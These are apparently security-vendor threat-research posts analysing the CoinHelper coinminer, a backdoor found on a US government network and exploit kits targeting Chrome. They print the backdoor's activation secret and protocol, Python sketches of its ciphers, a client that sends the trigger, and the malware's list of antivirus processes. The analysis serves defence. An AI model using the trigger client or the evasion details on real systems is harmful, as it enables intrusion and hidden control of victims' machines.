The malware also monitors whether the victim is actually using their PC at the moment. If the user is idle for a while, in our particular case for 3 minutes, the current coinmining process is terminated and a new one is executed, set to leverage 100% of the CPU on all threads. This information (the PID) is stored in a file called mn.ld. When the PC is actively used, the mining is set to 50% of the available performance. GPU mining, on the other hand, is performed only when the user has not been actively using their PC (for 2 minutes).

The malware also lists all console windows present on the system and identifies those with visibility set to hidden. If such a window is found and it doesn't belong to CoinHelper, the malware considers it a competing miner and kills the process.

Data harvesting and AV checks

Like the previous AutoIt stage, Helper.exe also collects information about the infected system, as shown in the table below:

Information Purpose
Number of available CPU threads If the victim’s system is idle, the malware leverages all CPU threads
Video card type What kind of card is used – for Nvidia or AMD optimized coinmining
CPU type Not used (*see below)
Security solution Not used (*see below)
HW ID hashed by MD5 Appended to XMRig password, resulting in a parameter -p xMD5 (see Coinmining for details)

As marked (*) in the table above, the code contains functions for harvesting some information that are never actually executed: the malware could gather this information, but doesn’t. Given the similarities with the first stage, we suppose the authors left behind artifacts of previous versions when functionality shifted between the first AutoIt stage and the Helper.exe stage.

The malware recognizes which graphics card is available on the infected system. The cards are detected using a WMI query on Win32_VideoController. You can find all the cards, as listed in the malware, in the table below:

AMD Series AMD Model
RX 460, 470, 480, 540, 550, 560, 570, 580, 590, 640, 5500, 5600, 5700, 6800, 6900
R5 230
R7 240
VEGA 56, 64
Radeon 520, 530, 535, 540, 550, 610, 620, 625, 630, VII
WX 3100, 5100
Nvidia Series Nvidia Model
GTX 750, 970, 980, 980, 1050, 1060, 1070, 1080, 1650, 1660, TITAN
RTX 2050, 2060, 2070, 2080, 3060, 3070, 3080, 3090
GT 710, 720, 730, 740, 1030
Quadro K1000, K1200, P400, P620, P1000, P2000, P2200, P5000

If any of the cards above is detected and the video adapter name matches either “Advanced Micro Devices, Inc.” or “NVIDIA”, the malware uses XMRig to leverage the GPU for coinmining.

The list of graphics cards makes it apparent that the malware doesn’t hesitate to leverage even the newest models.
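The decision logic can be summarized in a short sketch. Python is used for illustration; the function name is hypothetical and the model lists are abbreviated excerpts of the tables above:

```python
# Sketch of the GPU-selection logic: the malware queries
# Win32_VideoController via WMI and checks both the card model and
# the adapter vendor string before choosing an XMRig configuration.
# Model lists below are excerpts of the full tables in the analysis.

AMD_MODELS = {"RX 580", "VEGA 64", "Radeon VII"}      # excerpt
NVIDIA_MODELS = {"GTX 1080", "RTX 3090", "GT 1030"}   # excerpt

def gpu_mining_target(card_name, vendor):
    """Return 'amd', 'nvidia', or None for the detected card."""
    if vendor.startswith("Advanced Micro Devices") and \
            any(m in card_name for m in AMD_MODELS):
        return "amd"
    if "NVIDIA" in vendor and any(m in card_name for m in NVIDIA_MODELS):
        return "nvidia"
    return None
```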

Bundled apps overview

After looking at the software the infected victims originally wanted to install, we can conclude that CoinHelper can be bundled with practically anything. So far, we’ve seen over 2,700 different apps bundled with CoinHelper (differentiated by unique SHA256 hashes). The majority of the software consists of clean installers, cracked software, cracked games, or game cheats, such as ChromeSetup, Photoshop, MinecraftSetup, Assassin’s Creed Valhalla, a CyberPunk 2077 trainer, or AmongUs cheats. With a repertoire like this, the authors of CoinHelper are able to reach almost any type of audience, ensuring the successful spread of the malware.

Persuading someone to download supposedly clean software that is in reality bundled with malware is easier than persuading someone to willingly download malware that is secretly bundled with another malware. The authors of CoinHelper are not afraid of this challenge: we observed CoinHelper bundled with malware samples such as 888 RAT and njRAT. We assume this approach extends the target group to “script kiddies” and inexperienced people with an interest in malware. As this group is very specific, there are only a few malware samples in comparison with the amount of other software. A graphical overview of this proportion can be seen in the image below.

Origin of the bundled apps

Apart from the Yandex Disk storage from where we started our investigation, we can confirm that another considerable method of spreading CoinHelper is via malicious torrents placed on internet forums focused on cracked software.

Forums overview

The authors of the malware successfully made it easy for people to stumble upon the malicious torrents. During our research, we found CoinHelper bundled with software on Russian internet forums focused on cracked software:

  • windows-program[.]com
  • softmania[.]net

Even though we were able to find information about the number of downloads of the malware from these forums (more about this later), it wasn’t nearly enough to explain the number of hits from our user base. Because of this, we have to assume that there are dozens of forums like the ones mentioned above spreading malware through cracked software.

More about the forums

Let’s focus on the first forum, windows-program[.]com, as the other one is very similar. Among the thousands and thousands of articles, we found the samples we were looking for. As it turns out, a registered user named Alex4 created 29 different articles, mostly containing torrents for cracked software, including:

Advertised software Description & functionality
Ableton Live Suite 9.7.3 + Crack + торрент Audio workstation and music production software, currently priced at €599
Dr.Web Security Space x86 x64 + ключ + торрент Anti-virus solution
ESET NOD32 Smart Security + ключи + торрент Anti-virus solution
Avast Premier 11.2.2260 + ключ + торрент Anti-virus solution
Adobe Photoshop CC 2017.1.1 + Portable + торрент Photo and image editing software
Fraps 3.5.99 на русском + crack + торрент Screen capture and screen recording utility, popular for capturing gameplay video

As can be seen in the table above, CoinHelper can also be found bundled with multiple well-known AV solutions. To raise awareness of the threats that come with downloading an AV from sources like this, let’s take a closer look at a post about Avast AV.

The first thing to notice is that the post is from 2020-11-06. It also contains screenshots of the promised program, but these show a very old version of our AV from 2016. After launching the installation, users can choose between installing the old version or updating the AV to the newest version. Unfortunately, the installer was manipulated so that neither option works, and the no-update variant even crashes the system. As a result, users who fall for this download get no AV protection, might crash their system, and also get infected with CoinHelper. Because of this, we highly recommend downloading only signed software from verified and trustworthy sources and, if possible, verifying the hashes or checksums of installers.

As a matter of fact, none of the AV installers worked. After launching an installer, CoinHelper would install itself and the installation would then fail for various reasons. It makes sense that the malware authors would sabotage these installers, because there is no reason to give victims a tool that would kill and remove their freshly dropped malware from the system.

In the post, it is possible to download two different things:

  • A torrent file with which it is possible to download the advertised program with CoinHelper
  • A zip archive protected with a password “123” containing the advertised program with CoinHelper

After choosing between the zip archive and the torrent, the page opens a new tab with information about the file to be downloaded. In the image below, it is possible to see the date when the file was added to the page. Surprisingly, it is 2021-07-12 and not 2020-11-06, so the file is much newer than the post referencing it. Because we have seen multiple versions of the malicious AutoIt scripts, we suppose the malware authors keep updating these files with new versions of CoinHelper.

The image above also shows that the torrent file was downloaded 549 times; adding the 508 downloads of the zip archive, we can conclude that more than 1,000 people may have been infected from this one post on this forum alone. After checking all the forum posts and files uploaded by the user Alex4, we can confirm that the total number of downloads exceeded 45,000 as of 2021-11-02. We consider this number quite alarming, given that it represents the spread of malware from just a single internet forum.

The second forum (softmania[.]net) is quite similar. In this case, the malware is being spread from the account of the user WebGid4. This user has 56 publications on the forum, among which you can find posts about the following software:

Advertised software Description & functionality
Windows 11 64bit Pro-Home v.21 торрент Windows 11 ISO image
Adobe Photoshop Lightroom Classic 2021 v10.0 + торрен Photo and image editing software
Microsoft Office 2016 Professional Plus 16.0.7571.2075 + Ключ + Torrent MS Office package
VMware Workstation 12 Pro 12.5.4 Software that creates and runs virtual machines
Steinberg Cubase Pro 10.0.50 2020 + торрент Software for composing, recording, mixing and editing music

The first thing that caught our eye was the ISO image of the brand new OS Windows 11. The official Windows 11 release date was 2021-10-05, only a few weeks before the release of this blog post. This shows that the attackers keep pace with current trends and try hard to offer interesting software in order to infect as many victims as possible.

After downloading the torrent named “Windows 11 64bit Pro-Home v.21 торрент”, the victim’s torrent client fetches an ISO file named “windows_11_CLIENT_CONSUMER_x64FRE_en-us.iso”. This is a working ISO image of Windows 11 which installs a brand new operating system, but as a bonus it also deploys the CoinHelper hidden inside. After unpacking the ISO file, the bundled CoinHelper can be found in the executable \sources\setup.exe.

A more careful victim could spot a hint that something is off after clicking the download torrent link and opening the download page in a new tab. The torrent was added on 2021-07-10, only 17 days after the official announcement of Windows 11 and roughly 3 months before the official release. This alone raises many red flags and, as we later found out, it is the Windows 11 developer build that leaked in June 2021. This ISO image can also successfully upgrade an existing Windows OS to the new Windows 11, again with CoinHelper in it.

Seeding source

We’ve seen these malicious files being downloaded through torrents which are seeded from seed boxes. A seed box is a remote server used for storing and seeding files through the P2P network that can be rented as a service. Seed boxes serve as a layer of anonymity for attackers because instead of exposing their IP address, only the IP address of the seed box can be seen. They also ensure high availability of the content, because the seed box is supposed to be running 24/7 (unlike regular PCs). Furthermore, companies renting seed boxes also offer different bandwidths to be able to support even higher download rates.

When we looked into the malicious torrents from the user Alex4 on the windows-program[.]com forum, we saw that the malicious content is downloaded from a server with the IP address 88.204.193[.]34 on port 56000 (apart from other, probably already infected, seeders). After taking a closer look, we found that the IP address is located in Kazakhstan and is connected to a service named megaseed.


In this blog post, we presented a detailed technical analysis of CoinHelper, a family of AutoIt droppers powering a massive coinmining campaign that affects hundreds of thousands of users worldwide. The malware is spread bundled with other software, be it game cheats, cracked software, or even clean installers such as Google Chrome or AV products, as well as hidden in a Windows 11 ISO image, among many others.

Furthermore, we explained how the malware maps the victims of the campaign using public IP logging services to better understand the effectiveness of the chosen infection vectors in certain regions. Using these services, the malware also harvests information about victims’ security solutions and available computational power.

We explained how the malware can hide in literally any software from unofficial sources. The scope of the spreading is further amplified by seeding the bundled apps via torrents, abusing yet another unofficial way of downloading software.

Indicators of Compromise (IoC)

SHA256 File name
83a64c598d9a10f3a19eabed41e58f0be407ecbd19bb4c560796a10ec5fccdbf start.exe
cc36bb34332e2bc505da46ca2f17206a8ae3e4f667d9bdfbc500a09e77bab09c asacpiex.dll
ea308c76a2f927b160a143d94072b0dce232e04b751f0c6432a94e05164e716d CL_Debug_Log.txt
126d8e9e03d7b656290f5f1db42ee776113061dbd308db79c302bc79a5f439d3 32.exe
7a3ad620b117b53faa19f395b9532d3db239a1d6b46432033cc0ef6a8d2377cd 64.exe
7387e57e5ecfdba01f0ad25eeb49abf52fa0b1c66db0b67e382d3b9c057f51a8 32.txt
ff5aa6390ed05c887cd2db588a54e6da94351eca6f43a181f1db1f9872242868 64.txt
6753d1a408e085e4b6243bfd5e8b44685e8930a81ec27795ccd61f8d54643c4e amd.txt
93dd8ef915ca39f2a016581d36c0361958d004760a32e9ee62ff5440d1eee494 nvidia.txt
Logging services


List of checked security solutions

AV / Security solution Checked processes
Avast AvastUI.exe, AvastSvc.exe
NOD egui.exe, ekrn.exe
Kaspersky avp.exe, avpui.exe
AVG avguix.exe, AVGUI.exe
Dr.web dwengine.exe
Ad-Aware AdAwareTray.exe, AdAwareDesktop.exe
SecureAPlus SecureAPlus.exe, SecureAPlusUI.exe
Arcabit arcabit.exe, arcamenu.exe
Bitdefender seccenter.exe, bdagent.exe, bdwtxag.exe, agentcontroller.exe
Comodo cis.exe, vkise.exe
Cybereason CybereasonRansomFree.exe
Emsisoft a2guard.exe, a2start.exe
eScan escanmon.exe, TRAYICOS.exe, escanpro.exe
F-Prot FProtTray.exe, FPWin.exe
GData AVKTray.exe, GDKBFltExe32.exe, GDSC.exe
ikarus guardxkickoff.exe, virusutilities.exe
K7AntiVirus K7TSecurity.exe, K7TSMain.exe, K7TAlert.exe
MaxSecure Gadget.exe, MaxProcSCN.exe, MaxSDTray.exe, MaxSDUI.exe, MaxUSBProc.exe
McAfee McDiReg.exe, McPvTray.exe, McUICnt.exe, mcuicnt.exe, MpfAlert.exe, ModuleCoreService.exe, uihost.exe, delegate.exe
MicrosoftSecurityEssentials msseces.exe
Panda PSUAConsole.exe, PSUAMain.exe
TrendMicro PtSessionAgent.exe, uiSeAgnt.exe, uiWinMgr.exe
TrendMicro-HouseCall HousecallLauncher.exe, housecall.bin, HouseCallX.exe
Webroot WRSA.exe
ZoneAlarm zatray.exe
AhnLab-V3 ASDCli.exe, ASDUp.exe, MUdate.exe, V3UPUI.exe, V3UI.exe
Avira avgnt.exe, Avira.Systray.exe, ngen.exe, Avira.VPN.Notifier.exe, msiexec.exe
Bkav BkavHome.exe
BkavPro Bka.exe, BkavSystemServer.exe, BLuPro.exe
F-Secure fshoster32.exe
Jiangmin KVMonXP.kxp, KVPreScan.exe, KVXp.kxp
Kingsoft kislive.exe, kxetray.exe
NANO-Antivirus nanoav.exe
Qihoo-360 efutil.exe, DesktopPlus.exe, PopWndLog.exe, PromoUtil.exe, QHSafeMain.exe, QHSafeTray.exe, SoftMgrLite.exe
Rising popwndexe.exe, rsmain.exe, RsTray.exe
SUPERAntiSpyware SUPERAntiSpyware.exe
Tencent QQPCTray.exe, QQPCUpdateAVLib.exe, Tencentdl.exe, TpkUpdate.exe
VBA32 vba32ldrgui.exe, VbaScheluder.exe, BavPro_Setup_Mini_C1.exe
ViRobot hVrSetup.exe, hVrTray.exe, hVrScan.exe, hVrContain.exe
Zillya ZTS.exe
Defender MSASCui.exe, MSASCuiL.exe
SmartScreen smartscreen.exe

The post Toss a Coin to your Helper (Part 2 of 2) appeared first on Avast Threat Labs.

Avast Finds Backdoor on US Government Commission Network

16 December 2021 at 17:01

We have found a new targeted attack against a small, lesser-known U.S. federal government commission associated with international rights. Despite repeated attempts over the course of months, through multiple channels, to make them aware of this issue and help them resolve it, they would not engage.

After initial communication directly to the affected organization, they would not respond, return communications or provide any information.

The attempts to resolve this issue included repeated direct outreach to the organization. We also used other standard channels for reporting security issues directly to affected organizations, as well as the standard channels the United States Government has in place to receive reports like this.

Throughout these conversations and outreach, we received no follow-up and no information on whether the issues we reported have been resolved.

Because of the lack of discernible action or response, we are now releasing our findings to the community so they can be aware of this threat and take measures to protect their customers and the community. We are not naming the entity affected beyond this description.

Because they would not engage with us, we have limited information about the attack. We are unable to attribute the attack, its impact, or duration. We are only able to describe two files we observed in the attack. In this blog, we are providing our analysis of these two files.

While we have no information on the impact of this attack or the actions taken by the attackers, based on our analysis of the files in question, we believe it’s reasonable to conclude that the attackers were able to intercept and possibly exfiltrate all local network traffic in this organization. This could include information exchanged with other US government agencies and other international governmental and nongovernmental organizations (NGOs) focused on international rights. We also have indications that the attackers could run code of their choosing in the operating system’s context on infected systems, giving them complete control.

Taken altogether, this attack could have given total visibility of the network and complete control of a system and thus could be used as the first step in a multi-stage attack to penetrate this, or other networks more deeply.

Overview of the Two Files Found

The first file masquerades as oci.dll and abuses WinDivert, a legitimate packet capturing utility, to listen to all internet communication. It allows the attacker to download and run any malicious code on the infected system. The main purpose of this downloader may be to use its privileged local rights to bypass firewalls and network monitoring.

The second file also masquerades as oci.dll, replacing the first file at a later stage of the attack. It is a decryptor very similar to the one described by TrendLabs in Operation Red Signature. In the following text, we present our analysis of both of these files, describe the network protocol used, and demonstrate running arbitrary code on an infected machine.

First file – Downloader

We found this first file disguised as oci.dll (“C:\Windows\System32\oci.dll”, the name of the Oracle Call Interface library). It contains a compressed library (let us call it NTlib). This oci.dll exports only one function, DllRegisterService. The function computes the MD5 of the hostname and stops if it doesn’t match a hash it stores. This gives us two possibilities: either the attacker knew the hostname of the targeted device in advance, or the file was edited during installation to run only on the infected machine, making dynamic analysis harder.
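The gating logic itself is straightforward; a minimal Python sketch follows (the embedded hash below is a made-up placeholder and the function name is ours, not recovered from the sample):

```python
# Sketch of the hostname check in DllRegisterService: the MD5 of the
# machine's hostname is compared against a hash embedded in the binary.
import hashlib

EMBEDDED_HASH = "0" * 32  # placeholder; the real sample stores the target's hash

def hostname_matches(hostname, embedded=EMBEDDED_HASH):
    """Return True if MD5(hostname) equals the embedded hash."""
    digest = hashlib.md5(hostname.encode("utf-8")).hexdigest()
    return digest == embedded
```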

We found two samples of this file:

SHA256 Description
E964E5C8A9DD307EBB5735406E471E89B0AAA760BA13C4DF1DF8939B2C07CB90 has no hash stored and it can run on every PC
C1177C33195863339A17EBD61BA5A009343EDB3F3BDDFC00B45C5464E738E0A1 is exactly the same file but it contains the hash of hostname

Oci.dll then decompresses and loads NTlib and waits for the attacker to send a PE file, which is then executed.

NTlib works as a layer between oci.dll and WinDivert.

The documentation for WinDivert describes it as “a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows 7, Windows 8 and Windows 10. WinDivert can be used to implement user-mode packet filters, packet sniffers, firewalls, NAT, VPNs, tunneling applications, etc., without the need to write kernel-mode code.”

NTlib creates a higher-level interface for TCP communication on top of the low-level, IP-packet-oriented functions of WinDivert. As a crude form of authentication, NTlib checks that the structure passed as the first argument contains the magic bytes 0x20160303 at a specific position.

Exported functions of NTLib are:

  • NTAccept
  • NTAcceptPWD
  • NTSend
  • NTReceive
  • NTIsClosed
  • NTClose
  • NTGetSrcAddr
  • NTGetDscAddr
  • NTGetPwdPacket

The names of the exported functions are self-explanatory. The only interesting function is NTAcceptPWD, which takes an activation secret as an argument and sniffs all incoming TCP communication, searching for that secret. This means the malware does not open any port of its own; it reuses ports opened by the system or by other applications. The malicious communication is not reinjected into the Windows network stack, so the application listening on that port never receives it and doesn’t even know that traffic to its port is being intercepted.

The oci.dll uses NTlib to find communication containing the activation secret CB 57 66 F7 43 6E 22 50 93 81 CA 60 5B 98 68 5C 89 66 F1 6B. When NTlib captures the activation secret, oci.dll responds with Locale information (Windows GUID, OEM code page identifier and Thread Locale) and then waits for an encrypted PE file that exports SetNtApiFunctions. If the PE file is correctly decrypted, decompressed and loaded, oci.dll calls the newly obtained SetNtApiFunctions function.

The Protocol

As we mentioned before, the communication starts with the attacker sending CB 57 66 F7 43 6E 22 50 93 81 CA 60 5B 98 68 5C 89 66 F1 6B (the activation secret) over TCP to any open port of the infected machine.

The response of the infected machine:

  • Size of the message minus 24 (value: 28) [4 B]
  • Random encryption key 1 [4 B]
  • Encrypted with Random encryption key 1 and precomputed key:
    • 0 [4 B]
    • ThreadLocale [4 B]
    • OEMCP or 0 [4 B]
    • 0x20160814 (to test correctness of decryption) [4 B] 
    • 0,2,0,64,0,0,0 [each 4 B]

The encryption is an XOR cipher with a precomputed 256 B key:


that is further XORed with another 4 B key.
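Assuming a straightforward per-byte combination of the two keys (our reconstruction of the described scheme, with the real 256 B table replaced by a placeholder), the cipher can be sketched in Python:

```python
# Sketch of the layered XOR scheme: each byte is XORed with a byte
# from a precomputed 256 B table and with a 4 B random key sent in
# the message header. The table here is a placeholder; the indexing
# scheme is an assumption, not recovered code.

PRECOMPUTED = bytes(range(256))  # placeholder for the real 256 B table

def xor_crypt(data, key4, table=PRECOMPUTED):
    """XOR data with the 256 B table and the 4 B key. The operation
    is its own inverse, so it both encrypts and decrypts."""
    out = bytearray(len(data))
    for i, b in enumerate(data):
        out[i] = b ^ table[i % 256] ^ key4[i % 4]
    return bytes(out)
```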

After sending the above message, the infected machine awaits a follow-up message containing the encrypted PE file mentioned above:

  • Size of the message minus 24 [4 B]
  • Random Encryption key 2 [4 B]
  • Encrypted with Random encryption key 2 and precomputed key:
    • 6 (LZO level?) [4 B]
    • 0 [8 B]
    • 0x20160814 [4 B] 
    • 0x20160814 [4 B]
    • Size of the whole message [4 B]
    • Offset (0) [4 B]
    • Length (Size of the whole message) [4 B]
    • Encrypted with key 0x1415CCE and precomputed key:
      • 0 [16 B]
      • Length of decompressed PE file [4 B]
      • 0 [16 B]
      • Length of decompressed PE file [4 B]
      • 0 [16 B]
      • LZO level 6 compressed PE file

With the same encryption as the previous message.

In our research we were unable to obtain the PE file that is part of this attack. In our analysis, we demonstrated the code execution capabilities by using a library with the following function:

In a controlled lab setting, we were able to start the calculator on an infected machine over the network with the following python script (link to GitHub).
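The linked script itself is not reproduced here. Conceptually, a client only needs to connect to any open port on the target, send the activation secret, and read the Locale response before delivering the encrypted PE file; a minimal, hypothetical sketch of that first step:

```python
# Hypothetical illustration of the handshake described above: send the
# activation secret over TCP to any open port and read the Locale reply.
# The function name and parameters are ours, not from the linked script.
import socket

ACTIVATION_SECRET = bytes.fromhex(
    "CB5766F7436E22509381CA605B98685C8966F16B"
)

def knock(host, port, timeout=5.0):
    """Send the activation secret and return the raw reply
    (the 28-byte Locale message described above)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(ACTIVATION_SECRET)
        return s.recv(4096)
```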

Second File – Decryptor

The second file we found also masquerades as oci.dll. It replaced the first downloader oci.dll and likely represents another, later stage of the same attack. Its purpose is to decrypt the file “SecurityHealthServer.dll” and run it in memory.

SHA256: 6C6B40A0B03011EEF925B5EB2725E0717CA04738A302935EAA6882A240C2229A

We found that this file is similar to rcview40u.dll, which was involved in Operation Red Signature. rcview40u.dll (bcfacc1ad5686aee3a9d8940e46d32af62f8e1cd1631653795778736b67b6d6e) was signed with a stolen certificate and distributed to specific targets from a hacked update server. It decrypted a file named rcview40.log, which contained the 9002 RAT, and executed it in memory.

This oci.dll exports the same functions as rcview40u.dll:

The new oci.dll decrypts SecurityHealthServer.dll with RC4, using the string TSMSISRV.dll as the encryption key. This is similar to rcview40u.dll, which also uses RC4, decrypting rcview.log with the string kernel32.dll as the key.
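The decryption step itself is plain RC4. The sketch below is a generic Python implementation of the algorithm with the key described above, not code recovered from the sample:

```python
# Standard RC4 (KSA + PRGA). Since RC4 is a symmetric stream cipher,
# the same function both encrypts and decrypts.

def rc4(key, data):
    # Key-scheduling algorithm
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm, XORed with the data
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

# Usage as described in the analysis (file name from the sample):
# decrypted = rc4(b"TSMSISRV.dll", open("SecurityHealthServer.dll", "rb").read())
```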

Because of the similarities between this oci.dll and rcview40u.dll, we believe it is likely that the attacker had access to the source code of the three-year-old rcview40u.dll. The newer oci.dll contains minor changes, such as starting the decrypted file in a new thread instead of in a direct function call, which is what rcview40u.dll does. oci.dll was also compiled for the x86-64 architecture, while rcview40u.dll was only compiled for x86.


While we only have parts of the attack puzzle, we can see that the attackers against these systems were able to compromise systems on the network in a way that enabled them to run code as the operating system and capture any network traffic travelling to and from the infected system.

We also see evidence that this attack was carried out in at least two stages, as shown by the two different versions of oci.dll we found and analyzed.

The second version of the oci.dll shows several markers in common with rcview40u.dll that was used in Operation Red Signature such that we believe these attackers had access to the source code of the malware used in that attack.

Because the affected organization would not engage with us, we do not have any more factual information about this attack. It is reasonable to presume that some form of data gathering and exfiltration of network traffic happened, but that is informed speculation. Furthermore, because this attack could have given total visibility of the network and complete control of an infected system, it is also reasonable to speculate that it could be the first step in a multi-stage attack to penetrate this, or other networks, more deeply in a classic APT-type operation.

That said, we have no way to know for sure the size and scope of this attack beyond what we’ve seen. The lack of responsiveness is unprecedented and cause for concern. Other government and non-government agencies focused on international rights should use the IoCs we are providing to check their networks to see if they may be impacted by this attack as well.

The post Avast Finds Backdoor on US Government Commission Network appeared first on Avast Threat Labs.

Exploit Kits vs. Google Chrome

12 January 2022 at 16:37

In October 2021, we discovered that the Magnitude exploit kit was testing out a Chromium exploit chain in the wild. This really piqued our interest, because browser exploit kits have in the past few years focused mainly on Internet Explorer vulnerabilities and it was believed that browsers like Google Chrome are just too big of a target for them.

#MagnitudeEK is now stepping up its game by using CVE-2021-21224 and CVE-2021-31956 to exploit Chromium-based browsers. This is an interesting development since most exploit kits are currently targeting exclusively Internet Explorer, with Chromium staying out of their reach.

— Avast Threat Labs (@AvastThreatLabs) October 19, 2021

About a month later, we found that the Underminer exploit kit followed suit and developed an exploit for the same Chromium vulnerability. That meant there were two exploit kits that dared to attack Google Chrome: Magnitude using CVE-2021-21224 and CVE-2021-31956 and Underminer using CVE-2021-21224, CVE-2019-0808, CVE-2020-1020, and CVE-2020-1054.

We’ve been monitoring the exploit kit landscape very closely since our discoveries, watching out for any new developments. We were waiting for other exploit kits to jump on the bandwagon, but none other did, as far as we can tell. What’s more, Magnitude seems to have abandoned the Chromium exploit chain. And while Underminer still continues to use these exploits today, its traditional IE exploit chains are doing much better. According to our telemetry, less than 20% of Underminer’s exploitation attempts are targeting Chromium-based browsers.

This is some very good news because it suggests that the Chromium exploit chains were not as successful as the attackers hoped they would be and that it is not currently very profitable for exploit kit developers to target Chromium users. In this blog post, we would like to offer some thoughts into why that could be the case and why the attackers might have even wanted to develop these exploits in the first place. And since we don’t get to see a new Chromium exploit chain in the wild every day, we will also dissect Magnitude’s exploits and share some detailed technical information about them.

Exploit Kit Theory

To understand why exploit kit developers might have wanted to test Chromium exploits, let’s first look at things from their perspective. Their end goal in developing and maintaining an exploit kit is to make a profit: they just simply want to maximize the difference between money “earned” and money spent. To achieve this goal, most modern exploit kits follow a simple formula. They buy ads targeted to users who are likely to be vulnerable to their exploits (e.g. Internet Explorer users). These ads contain JavaScript code that is automatically executed, even when the victim doesn’t interact with the ad in any way (sometimes referred to as drive-by attacks). This code can then further profile the victim’s browser environment and select a suitable exploit for that environment. If the exploitation succeeds, a malicious payload (e.g. ransomware or a coinminer) is deployed to the victim. In this scenario, the money “earned” could be the ransom or mining rewards. On the other hand, the money spent is the cost of ads, infrastructure (renting servers, registering domain names etc.), and the time the attacker spends on developing and maintaining the exploit kit.

Modus operandi of a typical browser exploit kit

The attackers would like to have many diverse exploits ready at any given time because it would allow them to cast a wide net for potential victims. But it is important to note that individual exploits generally get less effective over time. This is because the number of people susceptible to a known vulnerability will decrease as some people patch and other people upgrade to new devices (which are hopefully not plagued by the same vulnerabilities as their previous devices). This forces the attackers to always look for new vulnerabilities to exploit. If they stick with the same set of exploits for years, their profit would eventually reduce down to almost nothing.

So how do they find the right vulnerabilities to exploit? After all, there are thousands of CVEs reported each year, but only a few of them are good candidates for being included in an exploit kit. Weaponizing an exploit generally takes a lot of time (unless, of course, there is a ready-to-use PoC or the exploit can be stolen from a competitor), so the attackers might first want to carefully take into account multiple characteristics of each vulnerability. If a vulnerability scores well across these characteristics, it looks like a good candidate for inclusion in an exploit kit. Some of the more important characteristics are listed below.

  • Prevalence of the vulnerability
    The more users are affected by the vulnerability, the more attractive it is to the attackers. 
  • Exploit reliability
    Many exploits rely on some assumptions or are based on a race condition, which makes them fail some of the time. The attackers obviously prefer high-reliability exploits.
  • Difficulty of exploit development
    This determines the time that needs to be spent on exploit development (if the attackers are even capable of exploiting the vulnerability). The attackers tend to prefer vulnerabilities with a public PoC exploit, which they can often just integrate into their exploit kit with minimal effort.
  • Targeting precision
    The attackers care about how hard it is to identify (and target ads to) vulnerable victims. If they misidentify victims too often (meaning that they serve exploits to victims who they cannot exploit), they’ll just lose money on the malvertising.
  • Expected vulnerability lifetime
    As was already discussed, each vulnerability gets less effective over time. However, the speed at which the effectiveness drops can vary a lot between vulnerabilities, mostly based on how effective is the patching process of the affected software.
  • Exploit detectability
    The attackers have to deal with numerous security solutions that are in the business of protecting their users against exploits. These solutions can lower the exploit kit’s success rate by a lot, which is why the attackers prefer more stealthy exploits that are harder for the defenders to detect. 
  • Exploit potential
    Some exploits give the attackers SYSTEM privileges, while others might only land them inside a sandbox. Exploits with less potential are also less useful, because they either need to be chained with other LPE exploits, or they place limits on what the final malicious payload is able to do.

Looking at these characteristics, the most plausible explanation for the failure of the Chromium exploit chains is the expected vulnerability lifetime. Google is extremely good at forcing users to install browser patches: Chrome updates are pushed to users when they’re ready and can happen many times a month (unlike e.g. Internet Explorer updates which are locked into the once-a-month “Patch Tuesday” cycle that is only broken for exceptionally severe vulnerabilities). When CVE-2021-21224 was a zero-day vulnerability, it affected billions of users. Within a few days, almost all of these users received a patch. The only unpatched users were those who manually disabled (or broke) automatic updates, those who somehow went a long time without relaunching the browser, and those running Chromium forks with bad patching habits.

A secondary reason for the failure could be attributed to bad targeting precision. Ad networks often allow the attackers to target ads based on various characteristics of the user’s browser environment, but the specific version of the browser is usually not one of these characteristics. For Internet Explorer vulnerabilities, this does not matter that much: the attackers can just buy ads for Internet Explorer users in general. As long as a certain percentage of Internet Explorer users is vulnerable to their exploits, they will make a profit. However, if they just blindly targeted Google Chrome users, the percentage of vulnerable victims might be so low that the cost of malvertising would outweigh the money they would get by exploiting the few vulnerable users. Google also plans to reduce the amount of information given in the User-Agent string. Exploit kits often rely heavily on this string for precise information about the browser version. With less information in the User-Agent header, they might have to come up with some custom version fingerprinting, which would most likely be both less accurate and more costly to maintain.
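To illustrate the targeting problem, here is a minimal sketch of the kind of User-Agent version check an exploit kit might perform. The regex and the version cutoff (CVE-2021-21224 was fixed in Chrome 90.0.4430.85) are our own illustrative assumptions, not Magnitude’s actual code:

```javascript
// Hypothetical sketch: decide whether a visitor's Chrome build predates the
// CVE-2021-21224 patch (shipped in Chrome 90.0.4430.85).
function isLikelyVulnerable(userAgent) {
  const m = userAgent.match(/Chrome\/(\d+)\.(\d+)\.(\d+)\.(\d+)/);
  if (!m) return false; // not Chromium-based, or UA already reduced
  const [major, , build, patch] = m.slice(1).map(Number);
  if (major !== 90) return major < 90;   // anything before 90 is vulnerable
  if (build !== 4430) return build < 4430;
  return patch < 85;                     // 90.0.4430.85 carries the fix
}

console.log(isLikelyVulnerable(
  'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ' +
  '(KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36')); // true
```

With a reduced User-Agent that freezes the build and patch components, a check like this degrades to guessing, which is exactly the fingerprinting problem described above.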

Now that we have some context about exploit kits and Chromium, we can finally speculate about why the attackers decided to develop the Chromium exploit chains. First of all, adding new vulnerabilities to an exploit kit seems a lot like a “trial and error” activity. While the attackers might have some expectations about how well a certain exploit will perform, they cannot know for sure how useful it will be until they actually test it out in the wild. This means it should not be surprising that sometimes, their attempts to integrate an exploit turn out worse than they expected. Perhaps they misjudged the prevalence of the vulnerabilities or thought that it would be easier to target the vulnerable victims. Perhaps they focused too much on the characteristics that the exploits do well on: after all, they have reliable, high-potential exploits for a browser that’s used by billions. It could also be that this was all just some experimentation where the attackers just wanted to explore the land of Chromium exploits.

